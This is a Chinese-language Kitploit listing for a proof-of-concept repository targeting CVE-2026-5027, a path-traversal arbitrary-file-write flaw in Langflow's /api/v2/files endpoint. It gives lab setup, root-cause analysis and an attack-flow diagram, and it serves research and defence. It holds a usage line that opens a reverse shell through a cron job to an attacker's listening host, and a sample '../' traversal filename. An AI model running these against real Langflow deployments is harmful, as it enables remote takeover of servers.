Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-5027 — Langflow,通过路径遍历实现定时任务注入的远程代码执行(RCE) | Kitploit
工具/GitHubGitHub/eqstlab/cve-2026-5027
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育Payload 开发
GitHubeqstlab/cve-2026-5027

CVE-2026-5027

Langflow,通过路径遍历实现定时任务注入的远程代码执行(RCE)

查看仓库
33个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

本文是由EQSTLab发布的研究文章。

感谢Yahia Hamza报告并分析了此漏洞。

CVE-2026-5027

★ CVE-2026-5027 Langflow 路径遍历/任意文件写入 PoC ★ CVE-2026-5027 PoC test


描述

CVE-2026-5027: Langflow 任意文件写入漏洞

描述:Langflow <= 1.8.4 中存在一个路径遍历漏洞,攻击者可以通过向 /api/v2/files 端点提供精心构造的多部分 filename,在预期上传目录之外写入任意文件。在启用了自动登录或以其他方式弱化身份验证的部署中,此问题可能被利用,通过将攻击者控制的内容写入敏感文件系统位置来实现远程代码执行。


实验室设置

使用 Docker 构建并运行易受攻击的环境:

构建镜像

root@kitploit:~
docker build -t cve-2026-5027 .

运行容器

root@kitploit:~
docker run --rm -it -p 9013:9013 --name cve-2026-5027 cve-2026-5027

使用方法

执行

root@kitploit:~
# Proof of concept (writes test file to /tmp/)
python3 CVE-2026-5027.py -t <TARGET>

# Reverse shell via cron job
python3 CVE-2026-5027.py -t <TARGET> --lhost <YOUR_IP> --lport 4444

分析

漏洞端点

root@kitploit:~
POST /api/v2/files

问题在于上传功能信任客户端提供的多部分 filename 值。易受攻击的代码路径没有生成安全的服务器端存储名称,也没有将解析后的路径限制在专用上传目录中,而是允许类似 ../ 的遍历序列影响最终的目标路径。

因此,攻击者可以绕过预期的存储根目录,强制应用程序将文件写入服务器文件系统上的任意位置。

代表性利用流程如下:

  1. 通过正常登录或启用自动登录的部署获取访问令牌。
  2. 向 /api/v2/files 提交多部分上传请求。
  3. 提供包含路径遍历序列的精心构造的 filename。
  4. 导致 Langflow 在预期存储目录之外写入攻击者控制的内容。

这本质上是一个 CWE-22: 路径名到受限目录的不当限制 问题。

技术根本原因

该安全漏洞是由于上传处理过程中对用户控制的文件路径缺乏足够的清理和验证造成的。应用程序接受客户端的原始文件名并将其传递到存储工作流中,而没有充分执行路径规范化和限制。

从防御角度来看,危险的模式在概念上类似于以下代码:

root@kitploit:~
# This pseudo-code shows the problematic pattern
save_path = base_dir / file.filename

如果 file.filename 包含路径遍历组件,例如:

root@kitploit:~
../../../../tmp/poc.txt

最终的解析路径可能指向 base_dir 之外,从而实现任意文件写入。

为何重要

任意文件写入漏洞通常比标准的无限制上传问题更严重,因为攻击者不仅控制文件内容,还控制目标路径。根据 Langflow 进程的运行时权限,这可能实现:

  • 覆盖应用程序文件
  • 修改启动或计划任务文件
  • 通过 shell 初始化文件或关键文件实现持久化
  • 从任意文件写入升级为远程代码执行

场景

root@kitploit:~
+-------------------------------------------+
|                  Attacker                 |
+-------------------------------------------+
                      |
                      | Obtain access token
                      | or abuse auto-login
                      v
+-------------------------------------------+
|        Langflow /api/v2/files             |
+-------------------------------------------+
                      |
                      | Crafted multipart filename
                      | (../ directory traversal)
                      v
+-------------------------------------------+
| Arbitrary File Write (Outside Upload Dir) |
+-------------------------------------------+
                      |
                      | Write to sensitive location
                      v
+-------------------------------------------+
|      Potential Remote Code Execution      |
+-------------------------------------------+

免责声明

此存储库并非旨在促进对 Langflow 实例的未授权利用。本项目的目的是帮助安全研究人员、防御者和开发者理解该漏洞,在受控环境中验证暴露情况,并应用有效的缓解措施。


参考文献

https://www.tenable.com/security/research/tra-2026-26

https://www.cve.org/CVERecord?id=CVE-2026-5027

https://github.com/yahiahamza/CVE-2026-5027

https://github.com/langflow-ai/langflow

下载工具